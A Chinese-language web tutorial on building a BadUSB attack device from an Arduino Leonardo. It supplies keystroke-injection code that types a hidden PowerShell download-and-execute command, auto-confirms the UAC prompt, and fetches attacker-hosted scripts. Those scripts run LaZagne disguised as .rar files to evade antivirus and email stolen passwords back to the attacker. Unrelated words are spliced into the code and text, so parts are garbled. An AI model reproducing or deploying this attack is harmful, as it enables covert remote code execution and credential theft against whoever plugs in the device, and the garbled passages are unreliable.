BadUSB原理浅析及制作指南
何为BadUsb
简介
通过硬件直接插⼊对⽅电脑,让对⽅电脑执⾏代码,达到⼲扰、控制主机或者窃取信息等⽬的。 威胁
BadUSB的威胁在于:恶意代码存在于U盘的固件中,PC上的杀毒软件⽆法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都⽆法应对BadUSB的攻击。 原理
硬件知识基础
HID攻击
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与⼈交互的设备,例如键盘、⿏标与游戏杆等。不过HID设备并不⼀定要有⼈机接⼝,只要符合HID类别规范的设备都是HID设备。⼀ 般来讲针对HID的攻击主要集中在键盘⿏标上,因为只要控制了⽤户键盘,基本上就等于控制了⽤户的电脑。攻击者会把攻击隐藏在⼀个正常的⿏标键盘中,当⽤户将含有攻击向量的⿏标或键盘,插⼊电脑时,恶意代码会被加载并执⾏。
Teensy
攻击者在定制攻击设备时,会向USB设备中置⼊⼀个攻击芯⽚,此攻击芯⽚是⼀个⾮常⼩⽽且功能完整的单⽚机开发系统,它的名字叫TEENSY。通过TEENSY你可以模拟出⼀个键盘和⿏标,当你插⼊这个定制的USB设备时,电脑会识别为⼀个键盘,利⽤设备中的微处理器与存储空间和编程进去的攻击代码,就可以向主机发送控制命令,从⽽完全控制主机,⽆论⾃动播放是否开启,都可以成功。
Arduino
Arduino是⼀款便捷灵活、⽅便上⼿的开源电⼦原型平台。 它构建于开放原始码simple
I/O介⾯版,并且具有使⽤类似Java、C语⾔的Processing/Wiring开发环境。主要包含两个主要的部分:硬件部分是可以⽤来做电路连接的Arduino电路板;另外⼀个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了。
新医学攻击流程
Bad-Usb插⼊后,会模拟键盘⿏标对电脑进⾏操作,通过这些操作打开电脑的命令终端,并执⾏⼀条命令,这条命令将从指定⽹址下载其他代码并于后台静默运⾏。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从⽽实现控制⽬标机或者窃取信息的⽬的。
制作⼯具
硬件
1286芯⽚或者2303芯⽚的U盘
这⾥我们使⽤的是:
BS Micro pro micro leonardo Arduino 开发板
淘宝链接:
软件
1 Arduino IDE
kali⾃带,win下载链接:
下载为zip,不需安装,直接解压就能⽤。
2 Teensyduino
下载后双击运⾏,安装的时候会有⼀步安装设备驱动,按提⽰安装之。
注意,安装时要求⼿动选择Arduino IDE的安装位置,此时选择之前步骤zip的解压⽬录即可。
安装成功后运⾏会发现这⾥有了许多可选项:
我们根据之前案例中使⽤的硬件,按图中所⽰,选择Arduino Leonardo这⼀项。
制作过程
1 硬件连接IDE
1. 硬件插⼊电脑
2. 打开Arduino IDE
3. ⼯具->版->选择“Arduino Leonardo”
4. ⼯具->Port->选择“COM* (Arduino Leonardo)”
5. 现在可以看到IDE右下⾓出现“Arduino Leonardo on COM*”
2 代码写⼊硬件
1.
复制如下代码到IDE中(代码在后⾯)
2. 将代码中的/main.ps1改成⾃⼰的域名
3.
点击IDE左上⾓ 对号图标 验证,然后点击 箭头图标 上传代码到硬件,没报错就OK了
舒玉泰4. 将硬件重新插⼊电脑,此时会看到电脑⾃动执⾏代码的全部动画过程代码解释:
void setup() {
delay(5000);
Keyboard .press (KEY_LEFT_CTRL);
亚里士多德柏拉图Keyboard .press (KEY_ESC);
Keyboard .releaseAll ();
delay(500);
Keyboard .print ("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('/main.ps1');");
Keyboard .press (KEY_LEFT_CTRL);
Keyboard .press (KEY_LEFT_SHIFT);
一氧化氮合成酶
Keyboard .press (KEY_RETURN);
Keyboard .releaseAll ();
delay(2500);
透析袋
Keyboard .press (KEY_LEFT_ALT);
Keyboard .press ('y');
Keyboard .releaseAll ();
delay(1500);
}
void loop() {}
插⼊后等待五秒,
按下ctrl+esc,(作⽤:在任何界⾯打开开始菜单)
等待半秒,
模拟输⼊⼀个字符串,并回车执⾏(作⽤:在开始菜单执⾏命令)
等待2.5秒,更改焦点,模拟键盘输⼊y(作⽤:绕过uac,得到系统许可)
3 准备服务器端代码
到此为⽌,硬件的设置已经完成,当硬件插⼊之后,系统会模拟键盘输⼊执⾏:
powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('/main.ps1'
浙江省消防条例也就是从域名下⾯的main.ps1⽂件下载代码并执⾏。
以下代码可在我的github下载:
1. 下载所需代码,
2. 修改main.ps1的2754⾏ 为上⾯的域名,
3. 修改main.ps1的2903-2919⾏ 为发送邮件配置 发送邮箱尽量不要⽤163
⼊⼝⽂件为GetPass.ps1,
4. 修改GetPass.ps1中的前两⾏,域名,Getpass.rar实际上是lazagne,⽤rar下载尽量避免出发安全软件,这个不放⼼可以百度下
载。command.rar实为bat 因为 lazagne注⼊lsass时会被安全软件拦截,所以⽤bat避免注⼊。修改GetPass.ps1中的邮箱配置,同main.ps1中的就⾏
5. 将这四个⽂件上传到公⽹服务器
4 测试
1. 插⼊硬件,观察电脑是否⾃⼰打开了开始菜单并执⾏命令,当你看到powershell的⿊⾊框⼀闪⽽过时,就可以拔下硬件了。
2. 此时电脑后台下载并运⾏代码,过⼏分钟邮箱就会收到邮件,⼀共两封。
1. 打开两个附件是这个样⼦的
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议